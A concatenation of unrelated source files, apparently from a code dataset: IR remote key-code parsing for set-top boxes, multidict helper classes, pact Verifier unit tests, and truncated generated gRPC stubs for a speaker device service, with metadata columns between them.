globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
#globalVariable.IRK_MAP['CH+'] = int(ch_plus_code.strip(), 16)
#globalVariable.IRK_MAP['CH-'] = int(ch_minus_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
globalVariable.IRK_MAP['TIMER'] = int(time_code.strip(), 16)
globalVariable.IRK_MAP['SOURCE'] = int(media_code.strip(), 16)
globalVariable.IRK_MAP['FILELIST']= int(reclist_code.strip(), 16)
globalVariable.IRK_MAP['AUDIO'] = int(audio_code.strip(), 16)
globalVariable.IRK_MAP['TV/R']= int(tv_radio_code.strip(), 16)
globalVariable.IRK_MAP['MUTE'] = int(mute_code.strip(), 16)
globalVariable.IRK_MAP['SUB'] = int(subt_code.strip(), 16)
#globalVariable.IRK_MAP['V.Format'] = int(vformat_code.strip(), 16)
globalVariable.IRK_MAP['ZOOM'] = int(zoom_code.strip(), 16)
globalVariable.IRK_MAP['TTX/CC'] = int(ttx_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(pav_code.strip(), 16)
#globalVariable.IRK_MAP['FIND'] = int(find_code.strip(), 16)
globalVariable.IRK_MAP['Play'] = int(play_code.strip(), 16)
globalVariable.IRK_MAP['Pause'] = int(pause_code.strip(), 16)
globalVariable.IRK_MAP['Stop'] = int(stop_code.strip(), 16)
globalVariable.IRK_MAP['<<'] = int(qback_code.strip(), 16)
globalVariable.IRK_MAP['>>'] = int(qplay_code.strip(), 16)
globalVariable.IRK_MAP['Rec'] = int(rpoint_code.strip(), 16)
#globalVariable.IRK_MAP['BSTART'] = int(bstart_code.strip(), 16)
elif section=='SaiKeDa':
sys_code = self.parseConfigItem(self.section,'System').split(':')[0]
mute_code = self.parseConfigItem(self.section,'MUTE').split(':')[0]
power_code = self.parseConfigItem(self.section,'POWER').split(':')[0]
code_1 = self.parseConfigItem(self.section,'1').split(':')[0]
code_2 = self.parseConfigItem(self.section,'2').split(':')[0]
code_3 = self.parseConfigItem(self.section,'3').split(':')[0]
code_4 = self.parseConfigItem(self.section,'4').split(':')[0]
code_5 = self.parseConfigItem(self.section,'5').split(':')[0]
code_6 = self.parseConfigItem(self.section,'6').split(':')[0]
code_7 = self.parseConfigItem(self.section,'7').split(':')[0]
code_8 = self.parseConfigItem(self.section,'8').split(':')[0]
code_9 = self.parseConfigItem(self.section,'9').split(':')[0]
code_0 = self.parseConfigItem(self.section,'0').split(':')[0]
audchl_code = self.parseConfigItem(self.section,'AUDCHL').split(':')[0]
vod_code = self.parseConfigItem(self.section,'VOD').split(':')[0]
up_code = self.parseConfigItem(self.section,'UP').split(':')[0]
dn_code = self.parseConfigItem(self.section,'DOWN').split(':')[0]
left_code = self.parseConfigItem(self.section,'LEFT').split(':')[0]
right_code = self.parseConfigItem(self.section,'RIGHT').split(':')[0]
ok_code = self.parseConfigItem(self.section,'OK').split(':')[0]
zhixun_code = self.parseConfigItem(self.section,'ZhiXun').split(':')[0]
back_code = self.parseConfigItem(self.section,'BACK').split(':')[0]
menu_code = self.parseConfigItem(self.section,'MENU').split(':')[0]
exit_code = self.parseConfigItem(self.section,'EXIT').split(':')[0]
red_code = self.parseConfigItem(self.section,'RED').split(':')[0]
green_code = self.parseConfigItem(self.section,'GREEN').split(':')[0]
yellow_code = self.parseConfigItem(self.section,'YELLOW').split(':')[0]
blue_code = self.parseConfigItem(self.section,'BLUE').split(':')[0]
mail_code = self.parseConfigItem(self.section,'MAIL').split(':')[0]
stock_code = self.parseConfigItem(self.section,'STOCK').split(':')[0]
fav_code = self.parseConfigItem(self.section,'FAV').split(':')[0]
pgup_code = self.parseConfigItem(self.section,'PgUP').split(':')[0]
pgdn_code = self.parseConfigItem(self.section,'PgDN').split(':')[0]
radio_code = self.parseConfigItem(self.section,'RADIO').split(':')[0]
vol_plus_code = self.parseConfigItem(self.section,'Vol+').split(':')[0]
vol_minus_code = self.parseConfigItem(self.section,'Vol-').split(':')[0]
tv_code = self.parseConfigItem(self.section,'TV').split(':')[0]
epg_code = self.parseConfigItem(self.section,'EPG').split(':')[0]
book_code = self.parseConfigItem(self.section,'BOOK').split(':')[0]
info_code = self.parseConfigItem(self.section,'Info').split(':')[0]
globalVariable.IRK_MAP['System'] = int(sys_code.strip(), 16)
globalVariable.IRK_MAP['POWER'] = int(power_code.strip(), 16)
globalVariable.IRK_MAP['1'] = int(code_1.strip(), 16)
globalVariable.IRK_MAP['2'] = int(code_2.strip(), 16)
globalVariable.IRK_MAP['3'] = int(code_3.strip(), 16)
globalVariable.IRK_MAP['4'] = int(code_4.strip(), 16)
globalVariable.IRK_MAP['5'] = int(code_5.strip(), 16)
globalVariable.IRK_MAP['6'] = int(code_6.strip(), 16)
globalVariable.IRK_MAP['7'] = int(code_7.strip(), 16)
globalVariable.IRK_MAP['8'] = int(code_8.strip(), 16)
globalVariable.IRK_MAP['9'] = int(code_9.strip(), 16)
globalVariable.IRK_MAP['0'] = int(code_0.strip(), 16)
globalVariable.IRK_MAP['AUDCHL'] = int(audchl_code.strip(), 16)
globalVariable.IRK_MAP['VOD'] = int(vod_code.strip(), 16)
globalVariable.IRK_MAP['UP'] = int(up_code.strip(), 16)
globalVariable.IRK_MAP['DOWN'] = int(dn_code.strip(), 16)
globalVariable.IRK_MAP['LEFT'] = int(left_code.strip(), 16)
globalVariable.IRK_MAP['RIGHT'] = int(right_code.strip(), 16)
globalVariable.IRK_MAP['OK'] = int(ok_code.strip(), 16)
globalVariable.IRK_MAP['ZhiXun'] = int(zhixun_code.strip(), 16)
globalVariable.IRK_MAP['BACK'] = int(back_code.strip(), 16)
globalVariable.IRK_MAP['MENU'] = int(menu_code.strip(), 16)
globalVariable.IRK_MAP['EXIT'] = int(exit_code.strip(), 16)
globalVariable.IRK_MAP['RED'] = int(red_code.strip(), 16)
globalVariable.IRK_MAP['GREEN'] = int(green_code.strip(), 16)
globalVariable.IRK_MAP['YELLOW'] = int(yellow_code.strip(), 16)
globalVariable.IRK_MAP['BLUE'] = int(blue_code.strip(), 16)
globalVariable.IRK_MAP['MAIL'] = int(mail_code.strip(), 16)
globalVariable.IRK_MAP['STOCK'] = int(stock_code.strip(), 16)
globalVariable.IRK_MAP['FAV'] = int(fav_code.strip(), 16)
globalVariable.IRK_MAP['PgUP'] = int(pgup_code.strip(), 16)
globalVariable.IRK_MAP['PgDN'] = int(pgdn_code.strip(), 16)
globalVariable.IRK_MAP['RADIO'] = int(radio_code.strip(), 16)
globalVariable.IRK_MAP['VOL+'] = int(vol_plus_code.strip(), 16)
globalVariable.IRK_MAP['VOL-'] = int(vol_minus_code.strip(), 16)
globalVariable.IRK_MAP['TV'] = int(tv_code.strip(), 16)
globalVariable.IRK_MAP['BOOK'] = int(book_code.strip(), 16)
globalVariable.IRK_MAP['Info'] = int(info_code.strip(), 16)
globalVariable.IRK_MAP['EPG'] = int(epg_code.strip(), 16)
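# --- Illustrative config layout (added sketch, not part of the original file) ---
# ParseIrkey reads caseInfo/irkey/irKey.cfg, keeps the text before the first
# ':' of each option value and parses it as a hexadecimal key code.  A
# hypothetical [Libra2] section consistent with that behaviour (all option
# values below are made up for illustration) could look like:
#
#   [Libra2]
#   System = 0x40:remote system code
#   POWER  = 0x0C:power toggle
#   OK     = 0x22:confirm
#
# so that, e.g., int('0x40'.strip(), 16) == 64 ends up in
# globalVariable.IRK_MAP['System'].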
| 64.06501
| 87
| 0.586044
| 3,874
| 33,506
| 4.896489
| 0.037429
| 0.122937
| 0.282355
| 0.324213
| 0.937213
| 0.913807
| 0.890822
| 0.890242
| 0.844589
| 0.842322
| 0
| 0.030219
| 0.234585
| 33,506
| 522
| 88
| 64.187739
| 0.709428
| 0.086014
| 0
| 0.637037
| 0
| 0
| 0.053684
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007407
| null | null | 0.002469
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
1dd991145324aac9dda1391b164147beb23eeadb
| 6,973
|
py
|
Python
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 1
|
2021-04-07T19:10:28.000Z
|
2021-04-07T19:10:28.000Z
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 4
|
2021-03-30T20:50:19.000Z
|
2022-01-06T17:16:18.000Z
|
src/hio/help/hicting.py
|
pfeairheller/hio
|
44669adb62c81357491f9f6157312bc1313b56cf
|
[
"Apache-2.0"
] | 3
|
2021-04-08T19:35:36.000Z
|
2021-06-03T13:39:05.000Z
|
# -*- encoding: utf-8 -*-
"""
hio.help.hicting module
"""
from multidict import MultiDict, CIMultiDict
from orderedset import OrderedSet as oset
class Hict(CIMultiDict):
"""
Hict is a Case Insensitive Keyed Multiple valued dictionary like class that
extends CIMultiDict and is used for HTTP headers which have case insensitive
labels.
Insertion order of keys preserved.
Associated with each key is a valuelist i.e. a list of values for that key.
https://multidict.readthedocs.io/en/stable/
CIMultiDict keys must be a subclass of str; no ints allowed
In CIMultiDict:
.add(key,value) appends value to the valuelist at key
m["key"] = value replaces the valuelist at key with [value]
m["key"] returns the first added element of the valuelist at key
MultiDict methods access values in FIFO order
Hict adds method to access values in LIFO order
Extended methods in Hict but not in CIMultiDict are:
nabone(key [,default]) get last value at key else default or KeyError
nab(key [,default]) get last value at key else default or None
naball(key [,default]) get all values inverse order else default or KeyError
firsts() get all items where item value is first inserted value at key
lasts() get all items where item value is last inserted value at key
"""
def __repr__(self):
return "{}({})".format(self.__class__.__name__, list(self.items()))
def nabone(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns last value at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def nab(self, key, *pa, **kwa):
"""
Usage:
.nab(key [, default])
returns last value at key if key in dict else default
returns None if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
return None
elif pa:
return pa[0]
else:
return kwa["default"]
def naball(self, key, *pa, **kwa):
"""
Usage:
.naball(key [, default])
returns list of values at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
# getall returns copy of list so safe to reverse
return list(reversed(self.getall(key)))
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def firsts(self):
"""
Returns list of (key, value) pairs where each value is first value at key
but with no duplicate keys. MultiDict .keys() returns a key for each
duplicate value
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.getone(k)) for k in keys]
def lasts(self):
"""
Returns list of (key, value) pairs where each value is last value at key
but with no duplicate keys. MultiDict .keys() returns a key for each
duplicate value
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.nabone(k)) for k in keys]
class Mict(MultiDict):
"""
Mict is a multiple valued dictionary like class that extends MultiDict.
Insertion order of keys preserved.
Associated with each key is a valuelist i.e. a list of values for that key.
https://multidict.readthedocs.io/en/stable/
MultiDict keys must be a subclass of str; no ints allowed
In MultiDict:
.add(key,value) appends value to the valuelist at key
m["key"] = value replaces the valuelist at key with [value]
m["key"] returns the first added element of the valuelist at key
MultiDict methods access values in FIFO order
Mict adds methods to access values in LIFO order
Extended methods in Mict but not in MultiDict are:
nabone(key [,default]) get last value at key else default or KeyError
nab(key [,default]) get last value at key else default or None
naball(key [,default]) get all values inverse order else default or KeyError
"""
def __repr__(self):
return "{}({})".format(self.__class__.__name__, list(self.items()))
def nabone(self, key, *pa, **kwa):
"""
Usage:
.nabone(key [, default])
returns last value at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def nab(self, key, *pa, **kwa):
"""
Usage:
.nab(key [, default])
returns last value at key if key in dict else default
returns None if key not in dict and default not provided.
"""
try:
return self.getall(key)[-1]
except KeyError:
if not pa and "default" not in kwa:
return None
elif pa:
return pa[0]
else:
return kwa["default"]
def naball(self, key, *pa, **kwa):
"""
Usage:
.naball(key [, default])
returns list of values at key if key in dict else default
raises KeyError if key not in dict and default not provided.
"""
try:
# getall returns copy of list so safe to reverse
return list(reversed(self.getall(key)))
except KeyError:
if not pa and "default" not in kwa:
raise
elif pa:
return pa[0]
else:
return kwa["default"]
def firsts(self):
"""
Returns list of (key, value) pairs where each value is first value at key
No duplicate keys
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.getone(k)) for k in keys]
def lasts(self):
"""
Returns list of (key, value) pairs where each value is last value at key
No duplicate keys
"""
keys = oset(self.keys()) # get rid of duplicates provided by .keys()
return [(k, self.nabone(k)) for k in keys]
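# --- Illustrative usage (added sketch, not part of the original module) ---
# Small demonstration of the FIFO vs. LIFO accessors described in the class
# docstrings above; it only assumes the multidict and orderedset packages this
# module already imports are installed.
def _example_hict_usage():
    h = Hict()
    h.add('Accept', 'text/html')
    h.add('accept', 'application/json')   # lookups are case-insensitive
    first = h.getone('Accept')            # 'text/html' (FIFO, from CIMultiDict)
    last = h.nabone('Accept')             # 'application/json' (LIFO, added here)
    return first, last, h.firsts(), h.lasts()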
| 32.133641
| 83
| 0.576509
| 926
| 6,973
| 4.315335
| 0.149028
| 0.027528
| 0.035035
| 0.035035
| 0.894895
| 0.894895
| 0.894895
| 0.859359
| 0.859359
| 0.838338
| 0
| 0.002403
| 0.343468
| 6,973
| 216
| 84
| 32.282407
| 0.870467
| 0.527176
| 0
| 0.95
| 0
| 0
| 0.035556
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15
| false
| 0
| 0.025
| 0.025
| 0.525
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1de6f11b3b57e2e4c30c72d3f68ee4103ec1d6ad
| 150
|
py
|
Python
|
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
scripts/__init__.py
|
atlefren/ToPHR
|
b6c5526894c29a59660cb941da0d6f7234f1e24b
|
[
"MIT"
] | null | null | null |
from tilemill import generate_mbtiles
from tilemill import generate
from tilemill import get_tilemill_projects
from tilemill import TileMillException
| 30
| 42
| 0.893333
| 19
| 150
| 6.894737
| 0.421053
| 0.366412
| 0.549618
| 0.396947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.106667
| 150
| 4
| 43
| 37.5
| 0.977612
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 8
|
3822e46215133712b8a8e5b2587cc1f9c26eafae
| 11,999
|
py
|
Python
|
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
tests/test_verifier.py
|
jnfang/pact-python
|
c4fe4220d1a4e26c939ed0dc4cd977e82183cdb3
|
[
"MIT"
] | null | null | null |
from collections import OrderedDict
from unittest import TestCase
import unittest
from mock import patch
from pact.verifier import Verifier
from pact.verify_wrapper import VerifyWrapper
def assertVerifyCalled(mock_wrapper, *pacts, **options):
tc = unittest.TestCase()
tc.assertEqual(mock_wrapper.call_count, 1)
mock_wrapper.assert_called_once_with(*pacts, **options)
class VerifierPactsTestCase(TestCase):
def setUp(self):
super(VerifierPactsTestCase, self).setUp()
self.addCleanup(patch.stopall)
self.verifier = Verifier(provider='test_provider',
provider_base_url="http://localhost:8888")
self.mock_wrapper = patch.object(
VerifyWrapper, 'call_verify').start()
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_verifier_with_provider_and_files(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts('path/to/pact1',
'path/to/pact2',
headers=['header1', 'header2'])
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
'path/to/pact2',
provider='test_provider',
custom_provider_headers=['header1', 'header2'],
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_verifier_with_provider_and_files_passes_consumer_selectors(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts(
'path/to/pact1',
'path/to/pact2',
headers=['header1', 'header2'],
consumer_version_selectors=[
# Using OrderedDict for the sake of testing
OrderedDict([("tag", "main"), ("latest", True)]),
OrderedDict([("tag", "test"), ("latest", False)]),
]
)
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
'path/to/pact2',
provider='test_provider',
custom_provider_headers=['header1', 'header2'],
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
consumer_selectors=['{"tag": "main", "latest": true}',
'{"tag": "test", "latest": false}'])
def test_validate_on_publish_results(self):
self.assertRaises(Exception, self.verifier.verify_pacts, 'path/to/pact1', publish=True)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_publish_on_success(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
output, _ = self.verifier.verify_pacts('path/to/pact1', publish_version='1.0.0')
assertVerifyCalled(mock_wrapper,
'path/to/pact1',
provider='test_provider',
provider_base_url='http://localhost:8888',
log_level='INFO',
verbose=False,
provider_app_version='1.0.0',
enable_pending=False,
include_wip_pacts_since=None)
@patch('pact.verifier.path_exists', return_value=False)
def test_raises_error_on_missing_pact_files(self, mock_path_exists):
self.assertRaises(Exception,
self.verifier.verify_pacts,
'path/to/pact1', 'path/to/pact2')
mock_path_exists.assert_called_with('path/to/pact2')
@patch("pact.verify_wrapper.VerifyWrapper.call_verify", return_value=(0, None))
@patch('pact.verifier.expand_directories', return_value=['./pacts/pact1', './pacts/pact2'])
@patch('pact.verifier.path_exists', return_value=True)
def test_expand_directories_called_for_pacts(self, mock_path_exists, mock_expand_dir, mock_wrapper):
output, _ = self.verifier.verify_pacts('path/to/pact1',
'path/to/pact2')
mock_expand_dir.assert_called_once()
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
def test_passes_enable_pending_flag_value(self, mock_wrapper):
for value in (True, False):
with self.subTest(value=value):
with patch('pact.verifier.path_exists'):
self.verifier.verify_pacts('any.json', enable_pending=value)
self.assertTrue(
('enable_pending', value) in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
@patch('pact.verifier.path_exists', return_value=True)
def test_passes_include_wip_pacts_since_value(self, mock_path_exists, mock_wrapper):
self.verifier.verify_pacts('any.json', include_wip_pacts_since='2018-01-01')
self.assertTrue(
('include_wip_pacts_since', '2018-01-01') in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
class VerifierBrokerTestCase(TestCase):
def setUp(self):
super(VerifierBrokerTestCase, self).setUp()
self.addCleanup(patch.stopall)
self.verifier = Verifier(provider='test_provider',
provider_base_url="http://localhost:8888")
self.mock_wrapper = patch.object(
VerifyWrapper, 'call_verify').start()
self.broker_username = 'broker_username'
self.broker_password = 'broker_password'
self.broker_url = 'http://broker'
self.default_opts = {
'broker_username': self.broker_username,
'broker_password': self.broker_password,
'broker_url': self.broker_url,
'broker_token': 'token'
}
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_with_broker(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
output, _ = self.verifier.verify_with_broker(**self.default_opts)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_and_publish_with_broker(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
self.default_opts['publish_version'] = '1.0.0'
output, _ = self.verifier.verify_with_broker(**self.default_opts)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
provider_app_version='1.0.0',
)
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
def test_verifier_with_broker_passes_consumer_selectors(self, mock_wrapper):
mock_wrapper.return_value = (True, 'some value')
output, _ = self.verifier.verify_with_broker(
consumer_version_selectors=[
# Using OrderedDict for the sake of testing
OrderedDict([("tag", "main"), ("latest", True)]),
OrderedDict([("tag", "test"), ("latest", False)]),
],
**self.default_opts
)
self.assertTrue(output)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
enable_pending=False,
include_wip_pacts_since=None,
consumer_selectors=['{"tag": "main", "latest": true}',
'{"tag": "test", "latest": false}'])
@patch("pact.verify_wrapper.VerifyWrapper.call_verify")
@patch('pact.verifier.path_exists', return_value=True)
def test_publish_on_success(self, mock_path_exists, mock_wrapper):
mock_wrapper.return_value = (True, 'some logs')
self.verifier.verify_with_broker(publish_version='1.0.0', **self.default_opts)
assertVerifyCalled(mock_wrapper,
provider='test_provider',
provider_base_url='http://localhost:8888',
broker_password=self.broker_password,
broker_username=self.broker_username,
broker_token='token',
broker_url=self.broker_url,
log_level='INFO',
verbose=False,
provider_app_version='1.0.0',
enable_pending=False,
include_wip_pacts_since=None)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
def test_passes_enable_pending_flag_value(self, mock_wrapper):
for value in (True, False):
with self.subTest(value=value):
with patch('pact.verifier.path_exists'):
self.verifier.verify_with_broker(enable_pending=value)
self.assertTrue(
('enable_pending', value) in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
@patch('pact.verify_wrapper.VerifyWrapper.call_verify', return_value=(0, None))
@patch('pact.verifier.path_exists', return_value=True)
def test_passes_include_wip_pacts_since_value(self, mock_path_exists, mock_wrapper):
self.verifier.verify_with_broker(include_wip_pacts_since='2018-01-01')
self.assertTrue(
('include_wip_pacts_since', '2018-01-01') in mock_wrapper.call_args.kwargs.items(),
mock_wrapper.call_args.kwargs,
)
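# --- Illustrative direct usage (added sketch, not part of the original tests) ---
# The cases above exercise Verifier through a mocked call_verify; a minimal
# non-test sketch of the same entry point, with placeholder provider name,
# base URL and pact path, might look like this.
def _example_direct_verification():
    verifier = Verifier(provider='test_provider',
                        provider_base_url='http://localhost:8888')
    # Mirrors the file-based path used in VerifierPactsTestCase.
    output, _ = verifier.verify_pacts('path/to/pact1', enable_pending=False)
    return output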
| 45.279245
| 109
| 0.572964
| 1,195
| 11,999
| 5.438494
| 0.098745
| 0.06601
| 0.049546
| 0.040006
| 0.878597
| 0.840591
| 0.816741
| 0.816741
| 0.810125
| 0.807047
| 0
| 0.014572
| 0.32511
| 11,999
| 264
| 110
| 45.450758
| 0.787972
| 0.006917
| 0
| 0.715596
| 0
| 0
| 0.168471
| 0.072862
| 0
| 0
| 0
| 0
| 0.09633
| 1
| 0.077982
| false
| 0.055046
| 0.027523
| 0
| 0.114679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
69af6d6b1260c91f611e0b1c6330db25070cc803
| 146
|
py
|
Python
|
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
raiden_contracts/tests/utils/address.py
|
konradkonrad/raiden-contracts
|
5726f744e8d7e80f7ca61401bd3f1084de57e30c
|
[
"MIT"
] | null | null | null |
import random
import string
def make_address():
return bytes(''.join(random.choice(string.printable) for _ in range(20)), encoding='utf-8')
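# --- Illustrative usage (added note, not part of the original helper) ---
# make_address() returns 20 pseudo-random printable ASCII characters encoded
# as UTF-8 bytes, handy for fabricating address-like test fixtures, e.g.:
#   assert len(make_address()) == 20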
| 20.857143
| 95
| 0.726027
| 21
| 146
| 4.952381
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023622
| 0.130137
| 146
| 6
| 96
| 24.333333
| 0.795276
| 0
| 0
| 0
| 0
| 0
| 0.034247
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0.25
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
69e194c8eca5147e6fc58f11b68e71d6b70c3643
| 45,350
|
py
|
Python
|
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
speaker/system_pb2_grpc.py
|
mratajsky/speaker
|
56fe584f42661463b6a85587d8b10783d511fd89
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from speaker import system_pb2 as speaker_dot_system__pb2
class DeviceStub(object):
"""Missing associated documentation comment in .proto file"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.GetInfo = channel.unary_unary(
'/Device/GetInfo',
request_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
response_deserializer=speaker_dot_system__pb2.DeviceInfo.FromString,
)
self.SetName = channel.unary_unary(
'/Device/SetName',
request_serializer=speaker_dot_system__pb2.DeviceName.SerializeToString,
response_deserializer=speaker_dot_system__pb2.Result.FromString,
)
class DeviceServicer(object):
"""Missing associated documentation comment in .proto file"""
def GetInfo(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def SetName(self, request, context):
"""Missing associated documentation comment in .proto file"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_DeviceServicer_to_server(servicer, server):
rpc_method_handlers = {
'GetInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetInfo,
request_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
response_serializer=speaker_dot_system__pb2.DeviceInfo.SerializeToString,
),
'SetName': grpc.unary_unary_rpc_method_handler(
servicer.SetName,
request_deserializer=speaker_dot_system__pb2.DeviceName.FromString,
response_serializer=speaker_dot_system__pb2.Result.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'Device', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Device(object):
"""Missing associated documentation comment in .proto file"""
@staticmethod
def GetInfo(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/Device/GetInfo',
google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
speaker_dot_system__pb2.DeviceInfo.FromString,
options, channel_credentials,
call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
